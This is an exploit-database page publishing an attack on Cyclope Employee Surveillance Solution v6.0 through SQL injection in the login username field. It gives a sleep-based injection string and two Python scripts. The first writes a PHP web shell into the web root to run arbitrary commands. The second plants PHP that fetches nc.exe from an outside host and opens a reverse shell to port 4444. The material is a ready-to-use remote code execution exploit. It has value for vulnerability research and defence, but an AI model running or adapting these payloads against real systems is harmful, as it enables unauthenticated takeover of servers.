0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Cyclope Employee Surveillance Solution v6.0 SQL Injection
[# Author: loneferret of Offensive Security
# Product: Cyclope Employee Surveillance Solution v6.0
# Version: 6.0
# Vendor Site: http://www.cyclope-series.com/
# Software Download: http://www.cyclope-series.com/download/index.html
# Software description:
# The employee monitoring software developed by Cyclope-Series is specially designed to inform
# and equip management with statistics relating to the productivity of staff within their organization.
# Vulnerability:
# Due to improper input sensitization, many parameters are prone to SQL injection.
# Most importantly, the username parameter in the application's login form.
#
# PoC 1:
# MySql sleep for 5 seconds.
# No Authentication Required.
# Page: /index.php
# Form: login
# Vulnerable Parameter: username
# username: x' or sleep(5) and '1'='1
# password: whatever
# As stated, nothing is checked before passing "username" to MySql.
# This results in MySql sleeping for 5 seconds, and a unsuccessful
# attempt.
# PoC 2:
# Remote Code Execution
# No Authentication Required.
# Page: /index.php
# Form: login
# Vulnerable Parameter: username
# Creates a small php shell in the application's root folder.
# It also has the added bonus of writing the administrator username and password
# Side note:
# This assumes a default installation. Which is located in "C:\Program Files\Cyclope\Ni4xLjA=\"
# If you are wondering what is "Ni4xLjA=", well it's the software's version number in Base64 (6.1.0).
# Using Owasp Zap, you can spider the site to find the application's root folder if ever it changes.
----Python Script Simple Backdoor----
#!/usr/bin/python
import urllib, cookielib
import urllib2
import sys
print "\n[*] Cyclope Employee Surveillance Solution v6.0 Remote Code Execution"
print "[*] Vulnerability discovered by loneferret"
print "[*] Offensive Security - http://www.offensive-security.com\n"
if (len(sys.argv) != 3):
print "[*] Usage: poc.py <RHOST> <CMD>"
print "[*] Ex. : poc.py 127.0.0.1 ipconfig"
exit(0)
rhost = sys.argv[1]
rcmd = sys.argv[2]
backdoor = "<?php system($_GET['exe']);?>"
prepayload = "x' or (SELECT 0x20 into outfile '/Progra~1/Cyclope/Ni4xLjA=/cmd.php' "
prepayload += "LINES TERMINATED BY 0x%s) and '1'='1" % backdoor.encode('hex')
act = 'auth-login'
pag = 'login'
password = 'hole'
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
post_params = urllib.urlencode({'act' : act, 'pag' : pag, 'username' : prepayload, 'password' : password})
print "[*] Sending evil payload"
resp = opener.open("http://%s:7879/" % rhost, post_params)
print "[*] Triggering backdoor"
cmd = 'http://%s:7879/Ni4xLjA=/cmd.php' % rhost
page = urllib.urlopen(cmd)
print "[*] Executing command: %s\n" % rcmd
shell = 'http://%s:7879/Ni4xLjA=/cmd.php?exe=%s' % (rhost,rcmd)
try:
page = urllib.urlopen(shell)
cmd = page.read()
print cmd
except:
print "[-] Oups! Somthing happened"
---Python Getting Shell---
#!/usr/bin/python
import urllib, cookielib
import urllib2
import sys
print "\n[*] Cyclope Employee Surveillance Solution v6.0 Remote Code Execution"
print "[*] Vulnerability discovered by loneferret"
print "[*] Offensive Security - http://www.offensive-security.com\n"
if (len(sys.argv) != 2):
print "[*] Usage: poc.py <RHOST>"
exit(0)
rhost = sys.argv[1]
backdoor = '''<?php
file_put_contents("nc.exe",
file_get_contents("http://172.16.194.163/nc.exe"));
shell_exec("nc.exe 172.16.194.163 4444 -e cmd.exe");?>'''
prepayload = "x' or (SELECT 0x20 into outfile '/Progra~1/Cyclope/Ni4xLjA=/cmd.php' "
prepayload += "LINES TERMINATED BY 0x%s) and '1'='1" % backdoor.encode('hex')
act = 'auth-login'
pag = 'login'
password = 'hole'
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
post_params = urllib.urlencode({'act' : act, 'pag' : pag, 'username' : prepayload, 'password' : password})
print "[*] Sending evil payload"
try:
resp = opener.open("http://%s:7879/" % rhost, post_params)
print "[*] Triggering Shell"
shell = 'http://%s:7879/Ni4xLjA=/cmd.php' % rhost
page = urllib.urlopen(shell)
cmd = page.read()
except:
print "[-] Oups! Somthing happened"
# 0day.today [2024-11-16] #